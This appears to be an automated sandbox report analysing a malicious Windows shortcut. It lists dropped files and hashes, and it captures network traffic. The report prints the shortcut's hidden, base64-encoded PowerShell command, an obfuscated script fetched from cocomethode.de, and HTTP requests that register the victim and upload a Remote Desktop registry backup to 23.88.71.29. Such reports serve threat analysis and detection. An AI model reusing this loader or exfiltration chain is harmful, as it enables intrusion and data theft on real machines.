Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Dec 11 11:44:01 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1332
Entropy (8bit):	3.997779595191864
Encrypted:	false
SSDEEP:	24:HWFzW91vsHQwK1mNII+ycuZhNsakSIPNnqS2d:/sfK1mu1ulsa3wqSG
MD5:	7F3EA04C5BEAF1349AB40F2E2EBD9BFC
SHA1:	6106DBE0BB44E424568172E30919A520FA8D5B13
SHA-256:	CFC0392B23E749A747826A7E575A38055092051956B7823C703239A9D0A7257D
SHA-512:	F9EA5BC7B6085EA270ED9AE729BA77034AF36379607C1D39538655A656A126214A3B9932F9A38E1EF97BD86AA07E4F985477AFD8861A8E52E20BD9A8CFBA55CA
Malicious:	false
Preview:	L....{Yg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\st5qs1wr\CSC2C64D26780D497590A0A819DD9C4D5F.TMP..................l;.p#rT...............5.......C:\Users\user\AppData\Local\Temp\RES2DEB.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.t.5.q.s.1.w.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

Process:	C:\Windows\System32\sppsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	796616
Entropy (8bit):	3.878012200104914
Encrypted:	false
SSDEEP:	6144:KEcXiBNLsfNeeD61SRawazmRnLekXEij/OnWRo1Yr+5i6ByhMTUA28yIGpZc:KEcXiBqfNeeD6qawazmRnLekXSSov3
MD5:	BB8D8642FBD78C17E491B5C591DC7059
SHA1:	A76985CCFB9FB2FA5A635470F81F9522737B4006
SHA-256:	766143A782AFA380828B9AA30E0F00E0BC32508B14E368C0F2C220B6F32D54D1
SHA-512:	A207E7DA997B4B0CA668AED32ED2913EC387D54B447E6E1F3F9E29FFCBC0BAEF6C8B90363332D5526AEC8B332E5E4824B3C27DAD46550C5413DC869A04ADA1A4
Malicious:	false
Preview:	..E(....................;._....................................$.$.G.l.o.b.a.l.$.$......my......................\.....Z...0...+.0.J.f.p.q.U.8.x.J.e.Y.n.Z.J.W.G.k.L.b.7.o./.C.D.+.A.J.9.U.P.y.A.e.m.R.4.2.m.F.n.1.s.=...........E(......................j.............................Z.......+.2.e.7.W.B.7.f.+.F.7.k.k.4.M.y.C.N.s.p.j.x.r.8.T.7.W.H.q.u.k.M.w.4.H.5.C.o.m.q.c.L.Q.=..........R2H....................Uz(.....................(5X.........D...O.f.f.i.c.e. .1.9.,. .T.I.M.E.B.A.S.E.D._.E.V.A.L. .c.h.a.n.n.e.l...............Z...0...+.4.R.6.u.F.1.m.q./.B.3.W.x.J.e./.F.6.Z.l.g.e.6.z.r.T.5.4.N.8.w.2.l.8.S.Q.Q.3.y.p.L.Q.=...........E(......................j.....................8..=....Z.......+.5.9.4.3.l.j.l.G.R.C.2.b.R.G.h.s.Y.q.K.N.O.g.0.3.U.y.s.i.K.c.w.b.c.a.T.k.W.2.V.f.N.4.=..........R2H....................Uz(......................PPu............!.......J...J...e.d.e.a.3.f.0.d.-.b.a.5.4.-.4.2.a.d.-.a.7.7.f.-.3.d.8.7.e.5.0.0.a.0.0.3.........e.d.e.a.3.f.0.d.-.b.a.5.4.-.4.2.a.d.-.a.7.7.f.-.

Process:	C:\Windows\regedit.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	5492
Entropy (8bit):	3.2564408602149646
Encrypted:	false
SSDEEP:	96:0PVJqMXWMRUYSFd5YtU6W66zpVwkP9Odgd8zkFJdlzOkJdB0u1Jd8ui4c4d8zB/H:sVJqgUZ/5+g7P94RgFx9R43Zy1TbZH56
MD5:	A766DECEF71813234AAF41DB4EF5086E
SHA1:	564473B1CB74ED13E820C62F30642836B8D983C6
SHA-256:	8CA780CD4F6488CBBB1B6999D935B4F8352B36B3E2E1E54301875C6483A87535
SHA-512:	C3CF7BADAD40C63C0479DD7A50762968038A9D402E8AE34697F30D09E206D5D090270013504B801EECB82D234280535E21629A6F23F1F04CE1CF2D3EF0C37051
Malicious:	true
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.Y.S.T.E.M.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.S.e.r.v.i.c.e.s.\.T.e.r.m.S.e.r.v.i.c.e.].....".D.e.p.e.n.d.O.n.S.e.r.v.i.c.e.".=.h.e.x.(.7.).:.5.2.,.0.0.,.5.0.,.0.0.,.4.3.,.0.0.,.5.3.,.0.0.,.5.3.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.....".D.e.s.c.r.i.p.t.i.o.n.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.7.".....".D.i.s.p.l.a.y.N.a.m.e.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.8.".....".E.r.r.o.r.C.o.n.t.r.o.l.".=.d.w.o.r.d.:.0.0.0.0.0.0.0.1.....".F.a.i.l.u.r.e.A.c.t.i.o.n.s.".=.h.e.x.:.8.0.,.5.1.,.0.1.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.3.,.0.0.,.0.0.,.0.0.,.1.4.,.0.0.,.0.0.,.\..... . .0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.....".I.m.a.g.e.P.a.t.h.".=.h.e.x.

File type:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=341, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Entropy (8bit):	2.7155412500408276
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	m9c7iq9nzP.lnk
File size:	5'576 bytes
MD5:	5a82981b8efc6b7947269d2fd544ce88
SHA1:	55efb0ab3772de1ff53eca9e11b164924a071787
SHA256:	1e186d774a1348a9d4aca53e2045901c8a882422293cdf20fd2a8bcaaa6c7818
SHA512:	a176dc37026879ef0f9d3de7e5731765ee2a89f791b259d2ebf014af4635f9b35847cd5feb2cd7405e6323b6afa7fd64a30d2e9e49e44148a57e62c37f9220ad
SSDEEP:	96:8ucL8rlMvomw/mheGqIz2lE5hgcZFLWjGRx4RpUAOh2Q:8uS8rlMvomnBLYRrOX
TLSH:	ACB1320269EB00D8E1A747311FDCF9FF477AF4122A2E7AB51140C7818B35784DA62EB9
File Content Preview:	L..................F.B..................................U...................5....P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........system32..B.....................

General
Relative Path:	..\..\..\..\..\..\Windows\system32\cmd.exe
Command Line Argument:	/v /k "powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Icon location:	%SystemRoot%\System32\imageres.dll

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 12:44:00.345201969 CET	50770	53	192.168.11.20	1.1.1.1
Dec 11, 2024 12:44:00.461328030 CET	53	50770	1.1.1.1	192.168.11.20

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:44:44.897128105 CET	73	OUT	GET /api/check HTTP/1.1 Host: cocomethode.de Connection: Keep-Alive
Dec 11, 2024 12:44:45.390845060 CET	1289	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHR3oJVLec7njHR5ZzOvdcFPYJZjBtASm01pm0hWKuwLbOVpq2Y4vjyp76%2FYSrXxgx1ItmuSA%2FnMwQFKldYFXbVUp5JI0oX1fPnLj%2Fj7%2BFFwgR%2FI9UKb%2BE0awJNPlLDosyR32tF28JCU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19807&min_rtt=1025&rtt_var=27215&sent=32958&recv=14540&lost=0&retrans=0&sent_bytes=47068971&recv_bytes=157972&delivery_rate=17620689&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f053978feb74587-ATL server-timing: cfL4;desc="?proto=TCP&rtt=73&min_rtt=19&rtt_var=33&sent=316&recv=293&lost=0&retrans=0&sent_bytes=8358475&recv_bytes=960&delivery_rate=3446473684&cwnd=152&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=104&min_rtt=20&rtt_var=63&sent=335&recv=309&lost=0&retrans=0&sent_bytes=8359666&recv_bytes=1599&delivery_rate=3274150000&cwnd=185&unsent_bytes=0&cid=000 Data Raw: Data Ascii:
Dec 11, 2024 12:44:45.390855074 CET	867	IN	Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 37 38 26 6d 69 6e 5f 72 74 74 3d 32 30 26 72 74 74 Data Ascii: 000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=78&min_rtt=20&rtt_var=29&sent=336&recv=316&lost=0&retrans=0&sent_bytes=8360073&recv_bytes=1570&delivery_rate=3274150000&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"se
Dec 11, 2024 12:44:45.391036034 CET	362	IN	Data Raw: 31 36 33 0d 0a 31 37 33 33 39 31 37 34 38 35 7c 46 5a 62 4f 6d 69 4b 77 6e 4c 68 7a 6d 47 57 45 43 4a 66 64 69 45 44 7a 6d 6d 79 4c 67 66 6c 63 55 6b 58 46 55 61 66 32 2f 4e 4b 63 33 46 79 61 46 2b 6f 50 49 48 51 41 68 4e 39 54 54 4b 48 6f 6a 55 Data Ascii: 1631733917485\|FZbOmiKwnLhzmGWECJfdiEDzmmyLgflcUkXFUaf2/NKc3FyaF+oPIHQAhN9TTKHojUNZn+VVCGTpFEt/jVANO6rSoHJKF22ji5/oBMHKqBzAXIkbidhkFBZxX+EXlHFd/2oQSP1SeIznT+vhscKe+bVEpGf2k6l0FhNc49JIMgIXVeeJcBdh4XtcqpBMp50iAzVrZwfLNWk7poR+Yi2SczJrrDzX1WZMS3h
Dec 11, 2024 12:44:45.391043901 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:45:49.420342922 CET	164	OUT	GET /client/ws HTTP/1.1 Host: 23.88.71.29:8000 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Key: zn3NUJR5OUOkcJwXn0ptwA== Sec-WebSocket-Version: 13
Dec 11, 2024 12:45:50.194467068 CET	834	IN	HTTP/1.1 101 Switching Protocols Upgrade: Websocket Server: Microsoft-IIS/8.5 Sec-Websocket-Accept: qVfkLA9SHamctxaI1rdTws3p4Jc= CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5k8TbPR3NoVbYTGVpQR95qWqVwkSR9iUiqKfRuIxZHqty25z%2BRuDYVHfHFE4FDQvCZFOKH%2BeZwC0J6J3fwVzvnrklRVpjLhXK0HxuM2Pezw1XZagkEbZY3rMF5Dkl9vD20rJKjYzn0ua"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f053b0c9e615d51-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5657&min_rtt=5657&rtt_var=2828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=307&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Connection: Upgrade Date: Wed, 11 Dec 2024 11:45:50 GMT

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:45:53.705368996 CET	234	OUT	POST /api/registry HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: application/json Content-Length: 102 Data Raw: 22 36 33 30 31 33 33 37 32 46 36 35 37 35 41 39 44 34 45 41 32 39 43 42 36 30 38 37 39 38 45 44 39 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "63013372F6575A9D4EA29CB608798ED9\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Dec 11, 2024 12:45:54.465262890 CET	811	IN	HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20BFps9DQrYMA8y6tWm%2F5C%2BhhoDV%2B%2B%2F9G2RvlF3vFzFE0HTobewptMuUnQ9N7zl9ySxu8nyBftMiMuDwPkWpvwutSWZI7QbQAdqkPpohxZKu2%2BBiAUTeCTMQ7gRugxRtN%2BRPnM7o9kcL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f053b276e293813-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5649&min_rtt=5649&rtt_var=2824&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=380&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Wed, 11 Dec 2024 11:45:54 GMT Content-Length: 32 Data Raw: 32 39 62 37 61 38 66 38 64 39 39 36 37 63 61 34 63 33 31 36 36 32 36 39 61 61 34 64 65 37 35 37 Data Ascii: 29b7a8f8d9967ca4c3166269aa4de757

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:45:54.682276011 CET	4096	OUT	POST /api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757 HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---------------------8dd19af756380cd Content-Length: 5689 Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 61 66 37 35 36 33 38 30 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 [TRUNCATED] Data Ascii: -----------------------8dd19af756380cdContent-Disposition: form-data; name="file"; filename="regBackup.reg"Content-Type: application/octet-streamWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00"Description"="@%SystemRoot%\\System32\\termsrv.dll,-267""DisplayName"="@%SystemRoot%\\System32\\termsrv.dll,-268""ErrorControl"=dword:00000001"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea, [TRUNCATED]
Dec 11, 2024 12:45:55.121659994 CET	841	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTNF5I4OVOPRQbpibiOs2uD6XQhRYCjlmxUZ5X5pIH938%2BxDesKl%2FcaHTXg%2BaJpaJGXlCFi%2B31CW4jApSbX9nBhuaJHnFJSXXcdvH831qTCK5NcW7O88wb6205fxQmPFsYZfTrT5i4%2FB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f053b2d7b9239e0-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5367&min_rtt=5349&rtt_var=2019&sent=9&recv=11&lost=0&retrans=0&sent_bytes=820&recv_bytes=6478&delivery_rate=541241&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Wed, 11 Dec 2024 11:45:54 GMT Content-Length: 41 Data Raw: 46 69 6c 65 20 72 65 67 42 61 63 6b 75 70 2e 72 65 67 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e Data Ascii: File regBackup.reg uploaded successfully.

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:00 UTC	161	OUT	GET /Zd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
2024-12-11 11:44:01 UTC	1204	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:01 GMT Content-Type: application/octet-stream Content-Length: 6429 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q7SXPSZ1%2FFj0qFvAOudmAbwKIqMFBFZ%2ByhR0JRzfHojvC%2BSiqVbSZW10IYU0CUT5Jj1ll6IfUgtmQl1gsVVg6wsyxMa9L800rBk%2F20UHPxpYT63HtqPxvN5plyeT2jYy8AKCS%2BqBRWhk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1080&min_rtt=1064&rtt_var=251&sent=7&recv=7&lost=0&retrans=0&sent_bytes=7158&recv_bytes=1126&delivery_rate=6494661&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f053865cc36bfea-ATL server-timing: cfL4;desc="?proto=TCP&rtt=39&min_rtt=39&rtt_var=19&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=42&min_rtt=42&rtt_var=21&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=91&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:44:01 UTC	219	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 37 32 38 26 6d 69 6e 5f 72 74 74 3d 31 31 33 36 39 36 26 72 74 74 5f 76 61 72 3d 32 34 30 33 34 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 37 35 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 35 38 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 61 36 36 66 62 37 66 62 34 66 33 36 66 30 38 30 26 74 73 3d 38 36 34 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113728&min_rtt=113696&rtt_var=24034&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=775&delivery_rate=33658&cwnd=252&unsent_bytes=0&cid=a66fb7fb4f36f080&ts=864&x=0"
2024-12-11 11:44:01 UTC	1315	IN	Data Raw: 24 62 73 6c 6c 6c 75 61 74 61 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 6c 70 58 52 6e 70 6b 57 45 70 73 54 46 55 35 61 57 46 74 56 6d 70 6b 51 32 74 31 55 54 49 35 4d 57 4a 75 55 54 64 45 55 57 39 72 57 6c 4e 42 4f 55 6c 47 64 46 52 6c 57 45 34 77 57 6c 63 77 64 56 5a 59 53 6e 42 59 56 47 38 32 55 6c 68 4f 61 6c 6c 59 51 6d 78 53 52 30 59 77 57 56 5a 4f 4d 47 4e 74 62 48 56 61 65 57 68 69 55 6c 63 31 4d 6d 46 59 53 6e 5a 69 62 54 46 73 59 6d 35 53 5a 45 39 71 63 46 5a 6a 4d 6c 5a 35 56 47 31 47 64 46 70 54 61 7a 64 45 55 57 39 72 5a 46 68 4b 63 30 6c 45 4d 47 64 4a Data Ascii: $bsllluata=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("TlpXRnpkWEpsTFU5aWFtVmpkQ2t1UTI5MWJuUTdEUW9rWlNBOUlGdFRlWE4wWlcwdVZYSnBYVG82UlhOallYQmxSR0YwWVZOMGNtbHVaeWhiUlc1MmFYSnZibTFsYm5SZE9qcFZjMlZ5VG1GdFpTazdEUW9rZFhKc0lEMGdJ
2024-12-11 11:44:01 UTC	1369	IN	Data Raw: 59 6a 4a 30 62 45 78 56 56 6a 52 6a 53 45 70 73 59 7a 4e 4f 63 47 49 79 4e 47 64 4c 52 6e 52 55 5a 56 68 4f 4d 46 70 58 4d 48 56 57 52 31 59 30 5a 45 4d 31 52 6d 4a 74 54 6e 5a 61 52 32 78 31 57 6a 45 77 4e 6b 39 73 56 6c 56 53 61 6d 64 31 55 6a 4a 57 4d 46 55 7a 55 6e 6c 68 56 7a 56 75 53 30 4e 53 61 57 56 59 55 6d 78 52 57 45 70 35 57 56 68 72 63 45 74 52 4d 45 73 3d 22 29 29 3b 0a 24 64 6e 6b 6c 66 79 78 64 6a 6e 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 53 6b 64 46 5a 31 42 54 51 57 6c 6b 56 7a 56 79 59 6d 30 35 4d 32 4a 70 53 54 64 4a 51 54 42 4c 5a 45 68 4b 4e 55 Data Ascii: YjJ0bExVVjRjSEpsYzNOcGIyNGdLRnRUZVhOMFpXMHVWR1Y0ZEM1RmJtTnZaR2x1WjEwNk9sVlVSamd1UjJWMFUzUnlhVzVuS0NSaWVYUmxRWEp5WVhrcEtRMEs="));$dnklfyxdjn=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkdFZ1BTQWlkVzVyYm05M2JpSTdJQTBLZEhKNU
